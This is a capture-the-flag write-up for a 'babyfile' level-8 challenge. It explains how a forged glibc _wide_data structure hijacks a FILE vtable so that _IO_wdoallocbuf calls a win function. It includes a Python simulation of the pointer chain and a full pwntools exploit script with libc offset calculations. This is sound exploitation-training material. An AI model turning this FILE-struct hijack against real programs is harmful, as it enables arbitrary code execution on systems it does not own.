(File Struct Exploits) level 8

Information

  • category: pwn

Description

Create a fake _wide_data struct to hijack control of the virtual function table of a FILE struct.

Write-up

When the program jumps into __GI__IO_wdoallocbuf it loads [wide_data + 0xe0], dereferences that to get the wide vtable, then reads [value + 0x68] (the __doallocate slot) and calls whatever address it finds there. So it's easy: right after the FILE struct, append the address of buff, and set fp.chain to the address of win. Then the following happens:

1- [rdi + 0xe0] –> rdi is wide_data, which is buff if we set fp._wide_data = buff
2- [buff + 0xe0] –> the extra pointer we appended, which is the address of buff
3- [buff + 0x68] –> the _chain field, which holds the address of win
4- call win
5- good luck, pwner hmmm (:_:)
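To make those four dereferences concrete, here is an added example (not the write-up's exploit and not pwntools code) that builds the same 0xe0-byte FILE image plus the trailing pointer with constructed addresses and replays the pointer chase that _IO_wdoallocbuf performs; the values of buff, win and _IO_wfile_overflow are made up, and the field offsets are the standard 64-bit glibc ones.

```python
import struct

# 64-bit glibc layout assumed by the write-up
FILE_SIZE = 0xe0          # sizeof(struct _IO_FILE) including the vtable slot
OFF_CHAIN = 0x68          # FILE._chain; doubles as __doallocate of the fake wide vtable
OFF_LOCK = 0x88           # FILE._lock
OFF_WIDE_DATA = 0xa0      # FILE._wide_data
OFF_VTABLE = 0xd8         # FILE.vtable
OFF_WIDE_VTABLE = 0xe0    # _IO_wide_data._wide_vtable
OFF_DOALLOCATE = 0x68     # _IO_jump_t.__doallocate


def build_fake_file(buff, win, wfile_overflow):
    """Same image the write-up sends: a FILE whose _wide_data points back at
    buff, followed by one extra pointer so that [buff + 0xe0] is buff again."""
    img = bytearray(FILE_SIZE)
    struct.pack_into("<Q", img, OFF_CHAIN, win)
    struct.pack_into("<Q", img, OFF_LOCK, buff)
    struct.pack_into("<Q", img, OFF_WIDE_DATA, buff)
    struct.pack_into("<Q", img, OFF_VTABLE, wfile_overflow)
    img += struct.pack("<Q", buff)        # the p64(buff) appended after bytes(fp)
    return bytes(img)


def read_ptr(mem, base, addr):
    """Read a qword from the controlled buffer; anything outside it is a fault."""
    off = addr - base
    if off < 0 or off + 8 > len(mem):
        raise ValueError(f"dereference of {addr:#x} leaves the controlled buffer")
    return struct.unpack_from("<Q", mem, off)[0]


def resolve_doallocate(mem, buff):
    """Replay the chain _IO_wdoallocbuf walks: fp->_wide_data->_wide_vtable->__doallocate."""
    wide_data = read_ptr(mem, buff, buff + OFF_WIDE_DATA)              # step 1
    wide_vtable = read_ptr(mem, buff, wide_data + OFF_WIDE_VTABLE)     # step 2
    target = read_ptr(mem, buff, wide_vtable + OFF_DOALLOCATE)         # step 3
    return {"wide_data": wide_data, "wide_vtable": wide_vtable, "doallocate": target}


if __name__ == "__main__":
    # constructed addresses, not taken from the challenge
    BUFF, WIN, WFILE_OVERFLOW = 0x404100, 0x401236, 0x7ffff7fc0dc0
    image = build_fake_file(BUFF, WIN, WFILE_OVERFLOW)
    for name, value in resolve_doallocate(image, BUFF).items():
        print(f"{name:12} = {value:#x}")
```

Dropping the trailing pointer makes step 2 read past the buffer, which is why bytes(fp) alone is not enough.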

Exploit

from pwn import *

elf = context.binary = ELF("/challenge/babyfile_level8")
p = elf.process()


def exploit():
    # the challenge leaks a libc address (treated here as puts) and the buffer it reads into
    p.recvuntil(b"libc is: ")
    puts = int(p.recvline()[:-1], 16)

    p.recvuntil(b"writing to: ")
    buff = int(p.recvline()[:-1], 16)

    # offsets are for the challenge's libc build
    libc = puts - 0x84420
    _IO_wfile_overflow = libc + 0x1E8DC0
    wide_data = buff                    # the fake _wide_data overlaps the fake FILE

    fp = FileStructure()
    fp._lock = buff
    fp.chain = elf.sym['win']           # [buff + 0x68]: read as __doallocate of the fake wide vtable
    fp._wide_data = wide_data           # [fp + 0xa0]
    fp.vtable = _IO_wfile_overflow
    fp = bytes(fp) + p64(buff)          # [buff + 0xe0]: _wide_vtable of the fake wide_data -> buff

    input("DEBUG")                      # pause so a debugger can be attached before the send
    p.send(fp)

    p.interactive()


def main():
    exploit()


if __name__ == "__main__":
    main()

This post is licensed under CC BY 4.0 by the author.